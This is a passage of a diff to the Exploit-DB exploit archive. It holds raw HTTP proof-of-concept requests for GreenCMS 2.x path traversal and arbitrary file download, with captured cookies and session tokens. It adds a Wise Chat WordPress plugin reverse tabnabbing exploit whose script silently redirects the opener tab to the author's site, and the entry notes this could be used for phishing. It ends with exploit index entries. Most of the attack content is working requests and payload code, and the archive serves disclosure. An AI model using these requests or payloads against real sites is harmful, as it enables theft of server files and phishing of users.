greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPWluZGV4JmE9aW5kZXg%3D; greencms_post_add1=x%9Cm%901k%C30%10%85%FFJ%D0%ECPI%B5-%5B%84%2C%1D2e%EAX%85%60YgG%E0%D8%22%3A%0D%A1%F4%BF%F7%9C+%C8%90%ED%DE%BB%EF%C1%BB%FBea%89xF%8F%130%CDL%AA%AD%94%265C%0F%26%95%83%1ALR%95l%0E7%80%F9%EB%F8%CD%8A%27%DF%2F3%C2%8C%94%D8%85%FD%0A%D6%DC%A4%AAU%AE+%01%A2%5ESe%BF3%1Fa%9F%23%DE%11-%B2%8A%D8a%8A%E4%84d%27%1F%2F%D9%C7%7BX%7BD%3F%8FT%28%9Bp%0DS%87o%16K+%8Fg%E9%9E%8C%E4%A2%DDr%B1%95%E5Fr%FD%D9jYg%E2%BA8%3Fxp%AFT%B5%E1Rs%A1%C5J%F5%1DR%AB%1F%2Az%2A%18v%E3C%D0W%5Ci%E9%2B%D6U47%5C%D1%7DV%01%3B%FD%FD%03%84%F0b%FF
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Thu, 24 Jan 2019 22:45:40 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Set-Cookie: greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPWN1c3RvbSZhPXRoZW1lZXhwb3J0aGFuZGxlJnRoZW1lX25hbWU9Li4vLi4vLi4vZXhwbG9pdGRi; expires=Sat, 23-Feb-2019 18:45:40 GMT; Max-Age=2592000; path=/
 Content-Disposition: attachment; filename="exploitdb-313a669df7bd2494db4b81855ad9ffb4.zip"
 Content-Length: 128497375
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: application/octet-stream
 # POC: 
 # 2)
 # http://localhost/[PATH]/index.php?m=admin&c=media&a=downfile&id=[BASE64_FILE]
 # 
 GET /[PATH]/index.php?m=admin&c=media&a=downfile&id=aW5kZXgucGhw HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=9kv875ue1nd30aem1r11v7j4e1; scd39=d417d5511c72c08320; token=0d74f7745ef2ae866371f379887de13b; poll-20190124084438702=x; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; iCMS_iCMS_AUTH=23fead6b8NDfVdP8qVNpOPIPPUSpFJAso5x4PtfIdZ3nDi8o5wnWMSK3ChFfVeYSOHBG1oexoFRdZvpgU83b8Jf61eMlofgor_cA_M03jKYoXB3uVFTNACLmbQ; iCMS_USER_AUTH=219cbaebs-OpY5sJLvCCKTR3Dqt_oCHrxJW69eyU4H8ydfrP-oU2o_WTjmpI2rq_RlGfFU7z4khePqUAE_-e9BZoY7JqRmHEdQMwgIHvOFkLMuEm_MfWL5q_YjuZtjifggqF00S7XifyDwBoSSjLHF5_75serNlj4UzaM2Jx1UNECipmSjn0_LbHUxywdjrykOLebAf5KahIejKgbmJs25r1GkYT7kNAC4NCYzy8Bohr1Ty1LQpYq1D3Rid_82phOUD4q6sY3Ndaj8les5sAJvkEmXOwI8_y6lqBjZarygWlIh_O6b-nvRiE2cbaaMFsxJZZUlRvYU6RUWihB9yhFfg8UOZ9A41c_BdcyREjmQEGPPzBZnHBXZv4SbG-tj1gRr-L40L6EdGX-oKrbDC4oyt6vB0UzyzN9CZP5ZKWn8GzFGJAMWF7kFjPD_upiZiBd-rHyPyCZb0Tsr6920eRpm5ZPLiJ-cfKsR0Gm1s5vvsYO9BsTG1FogUhQwzjHbT4lIO3lUcpvxYSSc9wbE3R1izg2wME6ATQ6PEnszM; iCMS_userid=32dfb608S9QlPEJd2BZY81z70jgnBnJldGAo3OuRdbLJJbk_Qw; iCMS_nickname=32dfb608S9QlPEJd2BZY81b63296UnYxe2Yv3riRc-edc-xqFRw; ICMSSESSION=pahh0r0jsr9gre9e0vn1jmqp23; /TARGET/modules/system/admin.php_SystemCustomtag_sortsel=name; /TARGET/modules/system/admin.php_SystemCustomtag_ordersel=ASC; /TARGET/modules/system/admin.php_limitsel=15; /TARGET/modules/system/admin.php_SystemCustomtag_filtersel=default; /TARGET/modules/system/admin.php_SystemPages_sortsel=page_title; /TARGET/modules/system/admin.php_SystemPages_ordersel=ASC; /TARGET/modules/system/admin.php_SystemPages_filtersel=default; /TARGET/modules/content/admin/content.php_mod_content_Content_sortsel=content_title; /TARGET/modules/content/admin/content.php_mod_content_Content_ordersel=ASC; /TARGET/modules/content/admin/content.php_limitsel=15; /TARGET/modules/content/admin/content.php_mod_content_Content_filtersel=default; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548351649; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548355214; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPW1lZGlhJmE9ZG93bmZpbGUmaWQ9YVc1a1pYZ3VjR2h3; greencms_post_add1=x%9Cm%901k%C30%10%85%FFJ%D0%ECPI%B5-%5B%84%2C%1D2e%EAX%85%60YgG%E0%D8%22%3A%0D%A1%F4%BF%F7%9C+%C8%90%ED%DE%BB%EF%C1%BB%FBea%89xF%8F%130%CDL%AA%AD%94%265C%0F%26%95%83%1ALR%95l%0E7%80%F9%EB%F8%CD%8A%27%DF%2F3%C2%8C%94%D8%85%FD%0A%D6%DC%A4%AAU%AE+%01%A2%5ESe%BF3%1Fa%9F%23%DE%11-%B2%8A%D8a%8A%E4%84d%27%1F%2F%D9%C7%7BX%7BD%3F%8FT%28%9Bp%0DS%87o%16K+%8Fg%E9%9E%8C%E4%A2%DDr%B1%95%E5Fr%FD%D9jYg%E2%BA8%3Fxp%AFT%B5%E1Rs%A1%C5J%F5%1DR%AB%1F%2Az%2A%18v%E3C%D0W%5Ci%E9%2B%D6U47%5C%D1%7DV%01%3B%FD%FD%03%84%F0b%FF
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Thu, 24 Jan 2019 20:36:45 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Set-Cookie: greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPW1lZGlhJmE9ZG93bmZpbGUmaWQ9YVc1a1pYZ3VjR2h3; expires=Sat, 23-Feb-2019 20:36:45 GMT; Max-Age=2592000; path=/
 Content-Disposition: attachment; filename="index.php"
 Content-Length: 1031
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: application/octet-stream
--- a/exploits/php/webapps/46247.txt
+++ b/exploits/php/webapps/46247.txt
@ -0,0 +1,34 @@
 # Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
 # Date: 01-22-2019
 # Exploit Author: MTK (http://mtk911.cf/)
 # Vendor Homepage: https://kaine.pl/
 # Softwae Link: https://wordpress.org/plugins/wise-chat/
 # Version: Up to V2.6.3
 # Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
 # CVE : 2019-6780.
 # Plugin description:
 Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.
 # POC
 Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html
 <html>
 <script>
 if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
 if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
 </script>
 Open Redirect TEST
 </html>
 when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.
 #Technical Details & Impact:
 In a real life example, this would redirect to a phishing site to try gain credentials for users.
 # References:
 https://wordpress.org/plugins/wise-chat/#developers
 https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk/src/rendering/filters/post/WiseChatLinksPostFilter.php
 https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk#file6
 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6780
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6271,6 +6271,8 @@ id,file,description,date,author,type,platform,port
 46208,exploits/linux/dos/46208.c,"Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer",2019-01-21,wally0813,dos,linux,
 46216,exploits/windows/dos/46216.py,"Echo Mirage 3.1 - Buffer Overflow (PoC)",2019-01-21,"InitD Community",dos,windows,
 46236,exploits/macos/dos/46236.py,"Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)",2019-01-24,"Saeed Hasanzadeh",dos,macos,
 46246,exploits/multiple/dos/46246.txt,"Lua 5.3.5 - 'debug.upvaluejoin' Use After Free",2019-01-25,"Fady Mohammed Osman",dos,multiple,
 46248,exploits/multiple/dos/46248.c,"iOS/macOS - 'task_swap_mach_voucher()' Use-After-Free",2019-01-25,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40720,3 +40722,7 @@ id,file,description,date,author,type,platform,port
 46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - Authenticated Custom App RCE",2019-01-24,"Lee Mazzoleni",webapps,windows,8000
 46239,exploits/php/webapps/46239.txt,"ImpressCMS 1.3.11 - 'bid' SQL Injection",2019-01-24,"Mehmet Onder",webapps,php,80
 46240,exploits/hardware/webapps/46240.html,"Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery",2019-01-24,"Ali Can Gönüllü",webapps,hardware,80
 46243,exploits/hardware/webapps/46243.txt,"Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection",2019-01-25,"RedTeam Pentesting",webapps,hardware,
 46244,exploits/php/webapps/46244.txt,"GreenCMS 2.x - SQL Injection",2019-01-25,"Ihsan Sencan",webapps,php,80
 46245,exploits/php/webapps/46245.txt,"GreenCMS 2.x - Arbitrary File Download",2019-01-25,"Ihsan Sencan",webapps,php,80
 46247,exploits/php/webapps/46247.txt,"Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing",2019-01-25,MTK,webapps,php,80